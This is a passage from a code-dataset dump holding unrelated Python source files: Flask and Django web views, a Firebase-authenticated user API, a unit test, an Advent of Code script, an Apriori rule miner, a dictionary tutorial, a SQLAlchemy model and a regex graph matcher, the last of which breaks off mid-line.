\"Bending Type 2\",\n 2: \"Cycling\",\n 3: \"Lying\",\n 4: \"Sitting\",\n 5: \"Standing\",\n 6: \"Walking\",\n\n }\n # get() method of dictionary data type returns\n # value of passed argument if it is present\n # in dictionary otherwise second argument will\n # be assigned as default value of passed argument\n return switcher.get(argument, \"nothing\")\n\n\nif __name__ == \"__main__\":\n #app.run(host='127.0.0.1', port=8001, debug=True)\n\tapp.run(debug=True) # running the app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"23277785","text":"import unittest\nfrom core.swmm.options import dynamic_wave\n\n\nclass OptionsDynamicWaveTest(unittest.TestCase):\n \"\"\"Test OPTIONS section: Dynamic Wave\"\"\"\n def __init__(self):\n unittest.TestCase.__init__(self)\n\n def setUp(self):\n\n self.my_options = dynamic_wave.DynamicWave()\n\n def runTest(self):\n \"\"\"Test OPTIONS: Dynamic Wave \"\"\"\n name = self.my_options.SECTION_NAME\n assert name == \"[OPTIONS]\"\n\n expected_text = \"[OPTIONS]\\n\" + \\\n \" LENGTHENING_STEP \t0.0\\n\" + \\\n \" VARIABLE_STEP \t0.0\\n\" + \\\n \" INERTIAL_DAMPING \tNONE\\n\" + \\\n \" FORCE_MAIN_EQUATION\tH-W\\n\" + \\\n \" NORMAL_FLOW_LIMITED\tBOTH\\n\" + \\\n \" MAX_TRIALS \t8\\n\" + \\\n \" MIN_SURFAREA \t0.0\\n\" + \\\n \" HEAD_TOLERANCE \t0.005\\n\" + \\\n \" THREADS \t1\\n\" + \\\n \" MINIMUM_STEP \t0.5\"\n\n\n # Test example from expected_text\n test_text = expected_text\n self.my_options.set_text(test_text)\n actual_text = self.my_options.get_text() # display purpose\n assert self.my_options.matches(test_text)\n","sub_path":"test/core/swmm/test_options_dynamicwave.py","file_name":"test_options_dynamicwave.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"614128109","text":"from flask import request, Response\nimport requests\nimport json\nfrom flask_restplus import Api, Resource, Namespace, fields, Model\nimport datetime\nfrom firebase_admin import auth\nimport app.utils.messages as messages\nfrom app.apis.validate.user_validate import validate_user_signup_data\nfrom app.apis.models.user import add_models_to_namespace\nfrom app.apis.models.user import *\nfrom app.database.dao.user import UserDAO\nfrom app.utils.view_decorator import token_required\nimport os\n\nuser_ns = Namespace('user', description='Functions related to user')\nadd_models_to_namespace(user_ns)\n\n@user_ns.route('/register')\nclass UserRegister(Resource):\n \n @user_ns.response(201, \"%s\" % (\n {\"message\" : \"User was created successfully. Please check your email to verify the account\"}\n ))\n @user_ns.response(400, \"%s\" % (\n {\"message\" : \"user already exists\"}\n ))\n @user_ns.expect(register_user_model)\n def post(self):\n \n data = request.json\n \n not_valid = validate_user_signup_data(data)\n \n if not_valid:\n return not_valid\n \n result = UserDAO.create_user(data)\n return result\n \n\n@user_ns.route('/login')\nclass UserSignIn(Resource):\n \n @user_ns.response(200, \"User logged in successfully\", login_response_model)\n @user_ns.response(400, \"%s\" % (\n {\"message\": \"password is incorrect\"}\n ))\n @user_ns.expect(login_user_model)\n def post(self):\n data = request.json\n email = data['email']\n password = data['password']\n \n login_response = UserDAO.authenticate(email, password)\n return login_response\n\n\n@user_ns.route(\"/profile\")\nclass UserProfile(Resource):\n \n @user_ns.doc(params={'authorization': {'in': 'header', 'description': 'An authorization token'}})\n @user_ns.response(200, \"Profile Data\", profile_body)\n @user_ns.response(400, \"%s\\n%s\\n%s\\n%s\" % (\n messages.TOKEN_EXPIRED,\n messages.TOKEN_INVALID,\n messages.TOKEN_REVOKED,\n {\"message\": \"cannot find account\"}\n ),\n )\n @token_required\n def get(self):\n token = request.headers['authorization']\n \n decoded_token = auth.verify_id_token(token)\n uid = decoded_token['uid']\n \n try:\n user = UserDAO.get_profile(uid)\n except Exception as e:\n return {\"message\": \"cannot find account\"}, 400\n \n return user, 200\n \n \n @user_ns.doc(params={'authorization': {'in': 'header', 'description': 'An authorization token'}})\n @user_ns.response(200, \"%s\" % (messages.PROFILE_UPDATE_SUCCESSFULLY))\n @user_ns.response(400, \"%s\\n%s\\n%s\\n%s\" % (\n messages.TOKEN_EXPIRED,\n messages.TOKEN_INVALID,\n messages.TOKEN_REVOKED,\n {\"message\": \"cannot find account\"}\n ),\n )\n @user_ns.expect(update_profile_body)\n @token_required\n def put(self):\n data = request.json\n token = request.headers['authorization']\n decoded_token = auth.verify_id_token(token)\n uid = decoded_token['uid']\n\n try:\n user_updated_response = UserDAO.update_profile(uid, data)\n \n except Exception as e:\n return {\"message\": str(e)}, 400\n \n return user_updated_response\n\n@user_ns.route(\"/profile/image\")\nclass UserProfile(Resource):\n \n @user_ns.doc(params={'authorization': {'in': 'header', 'description': 'An authorization token'}})\n @user_ns.expect(200, \"Profile Image Url\", profile_image_update)\n @user_ns.response(400, \"%s\\n%s\\n%s\\n%s\" % (\n messages.TOKEN_EXPIRED,\n messages.TOKEN_INVALID,\n messages.TOKEN_REVOKED,\n {\"message\": \"Image updated successfully\"}\n ),\n )\n @token_required\n def put(self):\n data = request.json\n token = request.headers['authorization']\n \n decoded_token = auth.verify_id_token(token)\n uid = decoded_token['uid']\n \n try:\n update_image_response = UserDAO.update_profile_image(uid,data[\"image_url\"])\n except Exception as e:\n return {\"message\": str(e)}, 400\n \n return update_image_response\n \n\n\n@user_ns.route('/preferredlocation')\nclass UserUpdateLocation(Resource):\n \n @user_ns.doc(params={'authorization': {'in': 'header', 'description': 'An authorization token'}})\n @user_ns.response(200, \"%s\" % ({\"message\":\"Preferred location updated successfully\"}))\n @user_ns.response(400, \"%s\" % (\n {\"message\": \"Cannot update preferred location\"}\n ))\n @user_ns.response(401, \"%s\" % (\n {\"message\": \"This user cannot set preferred location\"}\n ))\n @user_ns.expect(update_preferred_location_body)\n @token_required\n def post(self):\n data = request.json\n token = request.headers['authorization']\n \n decoded_token = auth.verify_id_token(token)\n uid = decoded_token['uid']\n \n try:\n update_preferred_location_response = UserDAO.update_preferred_location(uid, data)\n except Exception as e:\n return {\"message\": str(e)}, 400\n \n return update_preferred_location_response\n \n \n @user_ns.doc(params={'authorization': {'in': 'header', 'description': 'An authorization token'}}) \n @token_required\n @user_ns.response(400, \"%s\\n%s\" % (\n {\"message\": \"Cannot find preferred location\"},\n {\"message\": \"User is not a donor. Cannot set preferred location\"}\n ))\n @user_ns.response(200, \"Preferred Location Data\", preferred_location_body)\n \n def get(self):\n token = request.headers['authorization']\n \n decoded_token = auth.verify_id_token(token)\n uid = decoded_token['uid']\n \n try:\n preferred_location_response = UserDAO.get_preferred_location(uid)\n except Exception as e:\n return {\"message\": str(e)}, 400\n \n return preferred_location_response\n \n\n@user_ns.route('/invite/moderator')\nclass InviteModerator(Resource):\n \n @user_ns.doc(params={'authorization': {'in': 'header', 'description': 'An authorization token'}})\n @user_ns.response(400, \"%s\\n%s\\n%s\\n%s\" % (\n {\"message\": \"Moderator is already registered. Do you want to proceed?\"},\n {\"message\": \"User with this email is already signed up as a recipient/donor\"},\n {\"message\": \"Invitation sent\"},\n {\"message\": \"User cannot invite moderator\"}\n ))\n @user_ns.doc(params={'email': 'Email of moderator'})\n @token_required\n def post(self):\n \n token = request.headers['authorization']\n decoded_token = auth.verify_id_token(token)\n uid = decoded_token['uid']\n args = request.args\n \n if \"email\" in args:\n mod_email = args.get(\"email\")\n else:\n return {\"message\": \"Please add email address of moderator\"}, 400\n \n try:\n send_mod_invite = UserDAO.send_invite_to_mod(uid, mod_email)\n except Exception as e:\n return {\"message\": str(e)}, 400\n \n return send_mod_invite\n\n@user_ns.route('/dashboard')\nclass UserDashboard(Resource):\n \n @user_ns.doc(params={'authorization': {'in': 'header', 'description': 'An authorization token'}})\n @token_required\n def get(self):\n \n token = request.headers['authorization']\n decoded_token = auth.verify_id_token(token)\n uid = decoded_token['uid']\n \n dashboard_response = UserDAO.get_dashboard(uid)\n \n return dashboard_response\n \n@user_ns.route('/history')\nclass UserDashboard(Resource):\n \n @user_ns.doc(params={'authorization': {'in': 'header', 'description': 'An authorization token'}})\n @token_required\n def get(self):\n \n token = request.headers['authorization']\n decoded_token = auth.verify_id_token(token)\n uid = decoded_token['uid']\n \n history_response = UserDAO.get_histroy(uid)\n \n return history_response\n \n# @user_ns.route('/resetpassword')\n# class ResetPassword(Resource):\n \n \n# def get(self):\n# email = request.args.get('email')\n# try:\n# link = auth.generate_password_reset_link(email, action_code_settings=None)\n# ''' Send password reset email ''' \n# # send_reset_link(email, link)\n \n# except Exception as e:\n# return {'message': e.args[0]}, 400\n \n# return messages.RESET_LINK_SENT, 200\n ","sub_path":"app/apis/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":8565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"305885093","text":"\n\n#open file and read its contents into an array as integers\nfilename = \"/Users/guy_steinberg/Dropbox/AdventOfCode/Day2_input.txt\"\ndef parse_input(filename, input_arr):\n input_file = open(filename, \"r\")\n\n for line in input_file:\n line_as_arr = line.split(',')\n for number in line_as_arr:\n input_arr.append(int(number))\n\n#debugging\n#input_arr = [1,9,10,3,2,3,11,0,99,30,40,50]\n#input_arr = [1,1,1,4,99,5,6,0,99]\n\n\n#helper funciton for computing values\ndef perform_operation(arr, opcode_index, func):\n #'func is either add or mult'\n try:\n pos1 = arr[opcode_index+1]\n pos2 = arr[opcode_index+2]\n pos3 = arr[opcode_index+3]\n if func == 'add':\n arr[pos3] = arr[pos1] + arr[pos2]\n else:\n arr[pos3] = arr[pos1] * arr[pos2]\n\n #print(input_arr)\n except:\n print(\"error\")\n\n#keep track of index for the opcode\n#opcode_index = 0\ndef part1_solution(arr) :\n\n for opcode_index in range(0,len(arr),4):\n if arr[opcode_index] == 1:\n #add nums at positions 1 & 2, store result in pos3\n perform_operation(arr, opcode_index, 'add')\n elif arr[opcode_index] == 2:\n perform_operation(arr, opcode_index, 'mult')\n elif arr[opcode_index] == 99:\n #halt program\n break\n else:\n print('error: invalid opcode')\n\n#replace pos 1 & 2 values as indicated by challange\n# part1_arr = []\n# parse_input(filename, part1_arr)\n# part1_arr[1] = 12\n# part1_arr[2] = 2\n# print(input_arr)\n\ndef part2_solution(arr):\n #inefficient and simple way, but it works for now (also are numbers are only\n # in range of 0-99 -> O(100^2*len(array)) worst case\n for noun in range(0,99):\n for verb in range(0,99):\n #reset input\n arr = []\n parse_input(filename, arr)\n print(noun, verb)\n arr[1] = noun\n arr[2] = verb\n \n if(arr[0] == 19690720):\n return (noun, verb)\n\npart2_arr = []\n# parse_input(filename, part2_arr)\nprint(part2_solution(part2_arr))\nprint(100*25+5)\n","sub_path":"Day2Challange.py","file_name":"Day2Challange.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"474163532","text":"from django.shortcuts import render, render_to_response\nfrom django.template.context_processors import csrf\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom squest_app.models import User, Question\nfrom django.utils import timezone\n\n\ndef display_registration_page(request):\n user = request.session.get('user_login', None)\n if user:\n return HttpResponseRedirect('user_page')\n else:\n return render_to_response(\"registration_page.html\", csrf(request))\n\n\ndef display_login_page(request):\n user_id = request.session.get('user_login', None)\n if user_id:\n return HttpResponseRedirect('user_page')\n else:\n return render_to_response(\"login_page.html\", csrf(request))\n\n\ndef register_new_user(request):\n data = request.POST\n args = (data['user_first_name'],\n data['user_last_name'],\n data['user_login'],\n data['user_password']\n )\n user = User()\n user.init_values(*args)\n user.save()\n request.session['user_login'] = user.pk\n return HttpResponseRedirect('/')\n\n\ndef perform_login(request):\n data = request.POST\n login = data.get('user_login', '')\n password = data.get('user_password', '')\n if not login and not password:\n return HttpResponseRedirect('/')\n user = User.authenticate(login, password)\n if user:\n request.session['user_login'] = user.pk\n return HttpResponseRedirect('user_page')\n else:\n return HttpResponseRedirect('/')\n\n\ndef perform_logout(request):\n data = request.session\n if data.get('user_login', None):\n del data['user_login']\n return HttpResponseRedirect('/')\n else:\n return HttpResponse(status=500)\n\n\ndef display_user_personal_page(request):\n data = request.session\n\n if data.get('user_login', None):\n user = User.objects.get(pk=data['user_login'])\n ret_dict = dict()\n ret_dict['questions'] = user.get_unpublished_questions()\n ret_dict['user'] = user\n ret_dict.update(csrf(request))\n return render_to_response(\"private_page.html\", ret_dict)\n else:\n return HttpResponseRedirect('/')\n\n\ndef display_public_page_of(request, user_login):\n data = request.session\n ret_dict = dict()\n if data.get('user_login', None):\n ret_dict['user'] = User.objects.get(pk=data['user_login'])\n ret_dict['anonymous_mode'] = False\n else:\n ret_dict['user'] = User.objects.get(pk='anonymous')\n ret_dict['anonymous_mode'] = True\n\n ret_dict['questions'] = Question.get_published_questions(user_login)\n ret_dict['author'] = User.objects.get(pk=user_login)\n ret_dict.update(csrf(request))\n return render_to_response(\"public_page.html\", ret_dict)\n\n\ndef ask_question(request):\n data = request.POST\n quest = data.get('question', '')\n to = data.get('to', '')\n if not quest and not to:\n return HttpResponseRedirect('user_page')\n user_login = request.session.get('user_login', 'anonymous')\n\n user_from = User.objects.get(pk=user_login)\n user_to = User.objects.get(pk=to)\n print(user_from.user_login)\n question = Question()\n question.question = quest\n question.asked_user = user_to\n question.asking_user = user_from\n question.save()\n print(question.asking_user.user_login)\n return HttpResponseRedirect('/' + to)\n\n\ndef answer_question(request):\n data = request.POST\n question_id = int(data.get('question_id', 0))\n answer = data.get('answer', '')\n if not question_id and not answer:\n return HttpResponseRedirect('/user_page')\n user = User.objects.get(pk=request.session['user_login'])\n question = Question.objects.all().filter(asked_user=user, published=False)[question_id]\n print(question)\n question.answer = answer\n question.answer_date = timezone.now()\n question.published = True\n question.save()\n return HttpResponseRedirect('/user_page')\n","sub_path":"squest_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"125201245","text":"# Standard imports\n# import itertools\n# import unittest\nfrom copy import deepcopy\n# from timeit import timeit\n# from collections import Counter\n\n# Third-party imports\n# from pandas import DataFrame as df\n# from pandas import read_csv\n\n\n\n# https://www-users.cs.umn.edu/~kumar001/dmbook/ch6.pdf\nclass AprioriAlgorithm(object):\n def __init__(self, *, dataset = None, minsup = None, minconf = None):\n # Attributes\n self.all_frequent_itemsets = None\n self.all_rules = None\n self.dataset = None\n self.minconf = None\n self.minsup = None\n self.n = None # number of transaction\n\n # Call methods\n self.set_dataset(dataset) if dataset else None\n self.set_minsup(minsup)\n self.set_minconf(minconf)\n\n\n def set_dataset(self, dataset):\n self.dataset = dataset\n self.n = len(self.dataset)\n return self\n \n \n def set_minconf(self, minconf):\n self.minconf = minconf\n return self\n\n\n def set_minsup(self, minsup):\n self.minsup = minsup\n return self\n \n\n def set_transaction_dataset(self, *, transaction_dataset, transaction_id_column, itemset_column):\n transaction_dataset_cloned = transaction_dataset.copy(deep = True)\n transaction_dataset_cloned = transaction_dataset_cloned[{\n transaction_id_column,\n itemset_column\n }] \\\n .dropna() \\\n .drop_duplicates() \\\n .sort_values([transaction_id_column, itemset_column]) \\\n .set_index([transaction_id_column])\n\n self.dataset = []\n for transaction_id in transaction_dataset_cloned.index.unique():\n itemsets = transaction_dataset_cloned.loc[[transaction_id], itemset_column].tolist()\n self.dataset.append(tuple(itemsets))\n self.n = len(self.dataset)\n return self\n\n\n def generate_all_frequent_itemsets(self):\n self.all_frequent_itemsets = dict()\n\n frequent_single_itemsets = previous_frequent_itemsets = self._generate_frequent_single_itemsets()\n self.all_frequent_itemsets.update(frequent_single_itemsets)\n\n while True:\n previous_itemsets = list(previous_frequent_itemsets.keys())\n candidate_itemsets = self._generate_candidate_itemsets(previous_itemsets)\n frequent_itemsets = self._prune_frequent_itemsets(candidate_itemsets)\n\n if frequent_itemsets:\n self.all_frequent_itemsets.update(frequent_itemsets)\n previous_frequent_itemsets = frequent_itemsets\n else:\n break\n return self\n\n\n def generate_all_rules(self):\n self.all_rules = dict()\n\n if not self.all_frequent_itemsets:\n self.generate_all_frequent_itemsets()\n\n for frequent_itemset, support in self.all_frequent_itemsets.items():\n if len(frequent_itemset) <= 1:\n continue\n \n self._generate_rules(itemset=frequent_itemset)\n return self\n \n \n def _calculate_support(self, itemset):\n itemset_cloned = frozenset(itemset)\n support = 0.0\n for event in self.dataset:\n if itemset_cloned.issubset(frozenset(event)):\n support += 1\n return support/self.n\n\n \n @staticmethod\n def _generate_candidate_itemsets(itemsets):\n candidate_itemsets = list()\n for i, itemset in enumerate(itemsets[:-1]):\n for itemset2 in itemsets[i+1:]:\n itemset_cloned = list(deepcopy(itemset))\n itemset_cloned.sort()\n itemset2_cloned = list(deepcopy(itemset2))\n itemset2_cloned.sort()\n if itemset_cloned[:-1] == itemset2_cloned[:-1]:\n candidate_itemset = set().union(itemset_cloned, itemset2_cloned)\n candidate_itemsets.append(frozenset(candidate_itemset))\n return candidate_itemsets\n\n\n def _generate_frequent_single_itemsets(self):\n single_itemsets = set()\n for event in self.dataset:\n for item in event:\n single_itemsets.add(frozenset([item]))\n frequent_single_itemsets = self._prune_frequent_itemsets(single_itemsets)\n return frequent_single_itemsets\n\n\n def _generate_rules(self, itemset, previous_consequents=None):\n if previous_consequents:\n consequents = self._generate_candidate_itemsets(previous_consequents)\n else:\n consequents = list(deepcopy(itemset))\n\n if consequents and len(itemset) == len(consequents[0]):\n return\n\n for consequent in deepcopy(consequents):\n antecedent = itemset.difference(frozenset([consequent]))\n confident = self.all_frequent_itemsets[frozenset(itemset)] / self.all_frequent_itemsets[frozenset(antecedent)]\n if confident >= self.minconf:\n lift = confident / self.all_frequent_itemsets[frozenset([consequent])]\n self.all_rules[(frozenset(antecedent), frozenset([consequent]))] = {\n 'support': self.all_frequent_itemsets[frozenset(itemset)],\n 'confident': round(confident, 7),\n 'lift': round(lift, 7)\n }\n else:\n consequents.remove(consequent)\n \n if consequents and len(itemset) > len(consequents[0]) + 1:\n self._generate_rules(itemset, previous_consequents = consequents)\n \n\n def _prune_frequent_itemsets(self, itemsets):\n frequent_itemsets = dict()\n for itemset in itemsets:\n itemset_cloned = frozenset(itemset)\n support = self._calculate_support(itemset_cloned)\n if support >= self.minsup:\n frequent_itemsets[itemset_cloned] = round(support, 7)\n return frequent_itemsets","sub_path":"ml_projects/apriori_algorithm.py","file_name":"apriori_algorithm.py","file_ext":"py","file_size_in_byte":5848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"419422242","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\n#字典\nfeature = {'color':'red','points':100}\nprint(feature['color'])\nprint(feature['points'])\n\n#添加键值对,字典是一种动态结构,可随时在其中添加键值对\nfeature = {'color':'red','points':100}\nprint(feature)\nfeature['height']=175\nfeature['weight']=150\nprint(feature)\n\n#修改\nfeature = {'color':'red','points':100}\nfeature['color']='green'\nprint(feature)\n\n#删除\nfeature = {'color':'red','points':100}\ndel feature['points']\nprint(feature)\n\n#由类似对象组成的字典\nfavourite_languages={\n 'python':'python',\n 'go':'go',\n 'c':'c',\n}\nprint(favourite_languages['c'].title())\n\n#遍历字典\nfavourite_languages={\n 'python':'python',\n 'go':'go',\n 'c':'c',\n}\nfor k,v in favourite_languages.items(): #items返回一个键-值对列表\n print(\"\\nkey: \" + k)\n print(\"value: \" + v)\n\n#遍历字典中的所有键\nfavourite_sports={\n 'basketball':'basketball',\n 'football':'football',\n 'badminton':'badminton',\n}\nfor k in favourite_sports.keys():\n print(k.title())\n\nfor v in favourite_sports.values():\n print(v)\n\nfavourite_colors={\n 'red':'red',\n 'green':'green',\n 'blue':'blue'\n ,\n}\nkeys=['red','blue']\nfor color in favourite_colors.keys():\n print(color.title())\n if color in keys:\n print ( \"Hi ,\" + color.title() + \", you favourite_color is \" + favourite_colors[color].title())\n\n#按顺序遍历字典中的所有键#\nfavourite_colors={\n 'red':'red',\n 'green':'green',\n 'blue':'blue'\n ,\n}\n\nfor color in sorted(favourite_colors.keys()):\n print(color.title())\n\n#遍历字典中的所有值#\n#set:剔除重复项#\nfavourite_colors={\n 'red':'red',\n 'green':'green',\n 'blue':'blue',\n 'visionguo':'red',\n}\n\nfor color in set(favourite_colors.values()):\n print(color.title())\n\n#嵌套\nvisionguo={'favourite_colors':'red','favourite_languages':'python','favourite_sports':'basketball'}\nvisionguo1={'favourite_colors':'green','favourite_languages':'go','favourite_sports':'football'}\nvisionguo2={'favourite_colors':'yellow','favourite_languages':'shell','favourite_sports':'badminton'}\n\nfavourites = [visionguo,visionguo1,visionguo2]\nfor favourite in favourites:\n print(favourite)\n\nfavourites = []\nfor number in range(30):\n visionguo={'favourite_colors':'red','favourite_languages':'python','favourite_sports':'football'}\n favourites.append(visionguo)\nfor favourite in favourites[0:3]:\n if favourite['favourite_colors']=='red':\n favourite['favourite_colors'] = 'black'\n favourite['favourite_languages'] ='c'\n favourite['favourite_sports'] = 'badminton'\n elif favourite['favourite_colors']=='black':\n favourite['favourite_colors'] = 'white'\n favourite['favourite_languages'] ='java'\n favourite['favourite_sports'] = 'tennis'\nfor favourite in favourites[0:5]:\n print(favourite)\nprint(str(len(favourites)))\n\n#在字典中存储列表\nvisionguo = {'favourite_color':'red','favourite_sports':['basketball','football']}\nfor favourite_sport in visionguo['favourite_sports']:\n print(favourite_sport)\n\nfavourite_languages = {'vision':['python','go'],'allen':['java'],'tom':['c++','c','c#']}\nfor name,languages in favourite_languages.items():\n print(\"\\n\" + name.title() + \" favourite language is:\")\n for language in languages:\n print(language.title())\n\n#在字典中存储字典\nusers = {\n 'visionguo' : {\n 'xing': 'vision',\n 'ming': 'guo',\n 'location': 'xian',\n },\n 'allensu' : {\n 'xing': 'allen',\n 'ming': 'su',\n 'location': 'beijing',\n},\n}\n\nfor username,user_info in users.items():\n print(\"\\n\" + \"username: \" + username.title())\n fullname = user_info['xing'] + \" \" + user_info['ming']\n location = user_info['location']\n\n print(\"\\tFullname : \" + fullname.title())\n print(\"\\tLocation : \" + location.title())\n\n\n","sub_path":"base/dic.py","file_name":"dic.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"260421414","text":"from sqlalchemy import Column, Integer, String, ForeignKey, BigInteger\nfrom sqlalchemy.orm import relationship\n\nfrom app.utils.base import base\n\n\nclass Post(base):\n __tablename__ = 'posts'\n id = Column(Integer, primary_key=True)\n text = Column(String(1000))\n user_id = Column(Integer, ForeignKey('users.id'))\n user = relationship('User', back_populates='posts')\n post_date = Column(BigInteger)\n status_id = Column(Integer, ForeignKey('statuses.id'))\n status = relationship('Status', back_populates='posts')\n photos = relationship('PostPhoto', back_populates='post')\n comments = relationship('Comment', back_populates='post')\n\n @property\n def serialize(self):\n return {\n 'id': self.id,\n 'text': self.text,\n 'user': self.user.serialize,\n 'postDate': self.post_date,\n 'photos': self.serialize_staff,\n 'type': self.status.title,\n 'commentsCount': len(self.comments),\n 'lastComment': self.serialize_last_comment\n }\n\n @property\n def serialize_photo(self):\n return [photo.serialize for photo in self.photos]\n\n @property\n def serialize_last_comment(self):\n if len(self.comments) > 0:\n return sorted(self.comments, key=lambda c: c.comment_date, reverse=True)[0].serialize\n else:\n return {}\n","sub_path":"app/model/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"263644139","text":"# -*- coding:utf-8 -*-\r\nfrom django.urls import reverse\r\nfrom django.http import HttpResponseRedirect\r\nfrom django.shortcuts import get_object_or_404, render\r\nfrom epflutils.decorators import cache_anonymous_user\r\n\r\nfrom channel import LIST_SPECIFIC_CHANNEL_ID, ID_SESAME_CHANNEL\r\nfrom channel.models import Channel\r\nfrom channel.views import get_working_channel\r\nfrom newsletter.models.newsletter_translation import NewsletterTranslation\r\nfrom translation.models import Translation\r\nfrom .forms import SearchForm\r\n\r\nNB_NEWS_BY_PAGE = 10\r\n\r\n\r\n# 15 min of cache\r\n@cache_anonymous_user(60*15)\r\ndef search(request, channel_name):\r\n \"\"\" Search news with many filters \"\"\"\r\n\r\n source = Channel.get_source_channel(channel_name, lang=request.LANGUAGE_CODE)\r\n channel = Channel.get_channel(channel_name)\r\n search_kwargs = {'lang': request.LANGUAGE_CODE}\r\n\r\n if channel_name == \"sciences on tourne\":\r\n channel_name = \"science! on tourne\"\r\n return HttpResponseRedirect(reverse('search',\r\n kwargs={'channel_name': channel_name, }))\r\n\r\n if channel_name == \"all\":\r\n is_searching_channel = False\r\n search_kwargs['channels_to_exclude'] = LIST_SPECIFIC_CHANNEL_ID\r\n search_kwargs['only_original'] = True\r\n else:\r\n is_searching_channel = True\r\n search_kwargs['channels_to_exclude'] = ()\r\n search_kwargs['only_original'] = False\r\n search_kwargs['order_by'] = \"-order\"\r\n search_kwargs['channels'] = (get_object_or_404(Channel, name__iexact=channel_name),)\r\n \r\n user_search = True\r\n \r\n if request.method == 'GET' and 'search' in request.GET:\r\n search_form = SearchForm(channel, request.GET)\r\n\r\n if search_form.is_valid():\r\n search_kwargs['keywords'] = search_form.get_keywords()\r\n search_kwargs['date_from'] = search_form.get_date_from()\r\n search_kwargs['themes'] = search_form.cleaned_data['themes']\r\n search_kwargs['faculties'] = search_form.cleaned_data['faculties']\r\n search_kwargs['publics'] = search_form.cleaned_data['publics']\r\n search_kwargs['categories'] = search_form.cleaned_data['categories']\r\n search_kwargs['projects'] = search_form.cleaned_data['projects']\r\n else:\r\n search_form = SearchForm(channel)\r\n user_search = False\r\n\r\n if request.user.is_authenticated:\r\n search_kwargs['select_news_direct_access_only'] = True\r\n\r\n translations = Translation.objects \\\r\n .search(**search_kwargs) \\\r\n .select_related('news', 'news__visual', 'news__thumbnail', 'news__category', 'news__channel')\r\n \r\n display_empty_channel_msg = (translations.count() == 0) and user_search\r\n\r\n if translations.count() <= NB_NEWS_BY_PAGE:\r\n nb_news_find = translations.count()\r\n else:\r\n nb_news_find = None\r\n \r\n newsletter_translations = None\r\n if channel:\r\n newsletter_translations = NewsletterTranslation.objects.filter(\r\n newsletter__channel__id=channel.id,\r\n lang=request.LANGUAGE_CODE,\r\n status=NewsletterTranslation.STATUS.published).order_by(\"-publish_date\")\r\n \r\n preview = (request.method == 'GET' and 'preview' in request.GET and request.GET['preview'])\r\n \r\n ## Pour ouvrir la news dans une nouvelle page\r\n is_webservice = False\r\n if channel and channel.id == ID_SESAME_CHANNEL:\r\n is_webservice = True \r\n \r\n return render(\r\n request,\r\n 'search.html',\r\n {\r\n 'channel': channel,\r\n 'translations': translations,\r\n 'search_form': search_form,\r\n 'source': source,\r\n 'channel_name': channel_name,\r\n 'css': Channel.get_css(channel_name),\r\n 'working_channel': get_working_channel(request),\r\n 'is_searching_channel': is_searching_channel,\r\n 'is_webservice': is_webservice,\r\n 'preview': preview,\r\n 'nb_news_find': nb_news_find,\r\n 'NB_NEWS_BY_PAGE': NB_NEWS_BY_PAGE,\r\n 'newsletter_translations': newsletter_translations,\r\n 'display_empty_channel_msg': display_empty_channel_msg,\r\n })\r\n","sub_path":"src/search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"117585592","text":"# !/usr/bin/env python3\nfrom copy import copy\n\nstart_point = 1\n'''graph_list = list of links represented by (orig, dest, value)'''\ngraph_list = [(1, 2, \"a\"), \n (2, 3, \"g\"), \n (2, 4, \"c\"), \n (2, 5, (\"SET\", \"F\", \"G\", \"H\")), \n (4, 2, (\"NOT\", \"\"))]\n\ndef graph_list2dict(graph_list):\n graph_dict = dict()\n\n for item in graph_list:\n orig = item[0]\n dest = item[1]\n value = item[2]\n\n if orig in graph_dict:\n if value in graph_dict[orig]:\n raise Exception(\"Each 2 links from the same link shouldn't have the same value.\")\n '''\n\t\t\telse:\n for link_value in graph_dict[orig]:\n if dest == graph_dict[orig][link_value]:\n raise Exception(\"The orig-dest pair are duplicated.\")'''\n\n else:\n graph_dict[orig] = dict()\n \n graph_dict[orig][value] = dest\n \n return graph_dict\n \ngraph_dict = graph_list2dict(graph_list)\nprint(graph_dict)\n\nstring1 = \"ag\"\nstring2 = \"acxcxcxc\"\n\n\ndef char_pattern_list_match(value, c):\n '''Match a char with char pattern list \"value\". Called with pattern match'''\n head = value[0]\n # char pattern [\"NOT\", \"a\"] = [^a]\n if head == \"NOT\":\n if len(value) > 2:\n raise Exception(\"in char pattern NOT contains only 1 sub-pattern\")\n return not (value_match(value[1], c))\n \n # char pattern [\"SET\", \"a\", \"b\", ...] = [ab...]\n elif head == \"SET\":\n if len(value) == 1:\n raise Exception(\"in char pattern SET contains at least 1 sub-pattern\")\n for i in value[1:]:\n if value_match(i, c):\n return True\n return False\n \n elif head == \"RANGE\":\n if len(value) != 3 or not (isinstance(value[1], str) and isinstance(value[2], str)):\n raise Exception(\"in char pattern RANGE contains only 2 chars\")\n elif len(value[1]) > 1 or len(value[2]) > 1:\n raise Exception(\"in char pattern RANGE contains no string of which length > 1\")\n else:\n lower_bound = ord(value[1])\n upper_bound = ord(value[2])\n if lower_bound > upper_bound:\n raise Exception(\n \"in char pattern RANGE the lower_bound must not bigger than upper bound.\")\n\n if ord(c) >= lower_bound and ord(c) <= upper_bound:\n return True\n else:\n return False\n else:\n raise Exception(\"The head of a char pattern list is not acceptable.\")\n\ndef value_match(value, c):\n if isinstance(value, str):\n is_meta_character = (len(value) == 2 and value[1] == 